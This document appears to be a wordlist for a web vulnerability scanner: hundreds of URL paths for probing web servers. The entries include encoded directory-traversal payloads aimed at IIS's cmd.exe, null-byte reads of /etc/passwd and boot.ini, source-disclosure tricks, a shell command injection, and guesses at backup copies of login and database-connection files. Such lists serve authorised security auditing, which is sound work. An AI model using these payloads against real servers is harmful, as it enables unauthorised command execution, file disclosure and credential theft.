../readme.txt
.jsp/web-inf/classes/env.java
.userid.pwd
_mem_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
_vti_bin/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
_vti_bin/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
_vti_bin/fpcount.exe?page=default.htm|image=2|digits=1
_vti_bin/shtml.dll/nosuch.htm
_vti_cnf/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
_vti_cnf/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
admin.asp.bak
admin/admin_login.asp.bak
admin/admin_login.asp.bk
admin/admin_login.jsp.bak
admin/admin_login.jsp.bk
admin/admin_login.php.bak
admin/admin_login.php.bk
admin/admin_login.pl.bak
admin/admin_login.pl.bk
admin/login.asp.bak
admin/login.asp.bk
admin/login.jsp.bak
admin/login.jsp.bk
admin/login.php.bak
admin/login.php.bk
admin/login.pl.bak
admin/login.pl.bk
admin_admin.asp.bak
admin_chklogin.asp.bak
admin_config.asp.bak
admin_index.asp.bak
admin_login.asp.bak
admin_login.asp.bk
admin_login.jsp.bak
admin_login.jsp.bk
admin_login.php.bak
admin_login.php.bk
admin_login.pl.bak
admin_login.pl.bk
admin_main.asp.bak
admin_menu.asp.bak
bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
book/inc/conn.asp.bak
cfdocs/exampleapp/email/getfile.cfm?filename=c:boot.ini
cfdocs/expeval/exprcalc.cfm?openfilepath=c:winntrepairsam._
cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
cgi-bin/hello.exe?aaaaaaaaaaaaaaaaaaaa...ax224
cgi-bin/newsdesk.cgi?t=../pass.txt
cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&topicsubject=&replyto=0
cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
cgi-bin/replicator/webpage.cgi/313373/ukr.htm
cgi-bin/store.cgi?startid=../etc/hosts%00.html
cgi-bin/store.cgi?startid=../etc/passwd%00.html
cgi-bin/way-board/way-board.cgi?db=way-board.cgi%00
cgi-bin/webplus.cgi?script=/webplus/webping/webping.wml
config.asp.bak
conn.asp.bak
conn.asp.bk
conn.inc.bak
conn.inc.bk
counter.inc.bak
counter.inc.bk
dbconnect.asp.bak
dbconnect.asp.bk
dbconnect.inc.bak
dbconnect.inc.bk
default.asp%3f+.htr
default.asp.
default.asp.bak
default.asp+.htr
exchange/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
exchange/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
exchange/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
global.asa%3f+.htr
global.asa.1
global.asa.2
global.asa.bak
global.asa.bk
global.asa.old
global.asa+.htr
iissamples/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
iissamples/exair/howitworks/codebrws.asp?source=/index.asp
iissamples/exair/howitworks/codebrws.asp?source=/login.asp
iissamples/exair/search/qfullhit.htw?ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/%c0%ae%c0%ae/default.asp
inc/conn.asp.bak
inc/conn.asp.bk
inc/conn.inc.bak
inc/conn.inc.bk
inc/counter.inc.bak
inc/counter.inc.bk
inc/dbconnect.asp.bak
inc/dbconnect.asp.bk
inc/dbconnect.inc.bak
inc/dbconnect.inc.bk
include/conn.asp.bak
include/conn.asp.bk
include/conn.inc.bak
include/conn.inc.bk
include/counter.inc.bak
include/counter.inc.bk
include/dbconnect.asp.bak
include/dbconnect.asp.bk
include/dbconnect.inc.bak
include/dbconnect.inc.bk
index.asp%3f.jsp
index.asp%3f+.htr
index.asp.
index.asp.bak
index.asp+.htr
index.html.bak
index.jsp%2e..
index.jsp%3f.jsp
index.jsp%3f+.htr
index.jsp.
index.jsp..
index.jsp.bak
index.jsp.jsp
index.php.bak
index.php?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
index.php3.%5c../..%5cconf/httpd.conf
list.asp.bak
login.asp%3f+.htr
login.asp.bak
login.asp.bk
login.asp?+.htr
login.jsp.bak
login.jsp.bk
login.php.bak
login.php.bk
login.pl.bak
login.pl.bk
main.asp%3f.htr
main.asp.
main.asp.bak
main.asp+.htr
manage.asp.bak
menu.asp.bak
msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
msadc/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
network_query.php?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
null.htw?ciwebhitsfile=/global.asa%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/index.asp%20&cirestriction=none&cihilitetype=full
opt/casp/admin/conf/hkey.current.user
passes/.htpasswd.nkmd
phpgroupware/inc/phpgwapi/phpgw.inc.php
phpmyadmin/config.inc.php
right.asp.bak
sample.jhtml.
samples/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
scripts/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
scripts/..%5c..%5cwinnt/system32/cmd.exe
scripts/..%bg%9v../winnt/system32/cmd.exe
scripts/..%bg%qf../winnt/system32/cmd.exe
scripts/..%cg%qf../winnt/system32/cmd.exe
scripts/..%ch%8s../winnt/system32/cmd.exe
scripts/..%ch%pc../winnt/system32/cmd.exe
scripts/..%s0%9v../winnt/system32/cmd.exe
scripts/..%s0%qf../winnt/system32/cmd.exe
scripts/..%s1%8s../winnt/system32/cmd.exe
scripts/..%s1%pc../winnt/system32/cmd.exe
scripts/..%t0%qf../winnt/system32/cmd.exe
scripts/bbs.pl%3f+.htr
scripts/bbs.pl?+.htr
scripts/default.asp+.pl
scripts/passwd.txt+.pl
scripts/test.pl?+.htr
scripts/tradecli.dll?template=..........boot.ini
scripts/we3.3.3/webevent.pl
servlet/com.livesoftware.jrun.plugins.jsp.jsp
servlet/com.livesoftware.jrun.plugins.ssi.ssifilter
servlet/com.unify.ewave.servletexec.uploadservlet
ss.cfg,ncl_items.html
subscribe.pl?test@test.com
technote/main.cgi/oops?board=free_board&command=down_load&filename=/../../../main.cgi
test.asp.bak
usermanage.asp.bak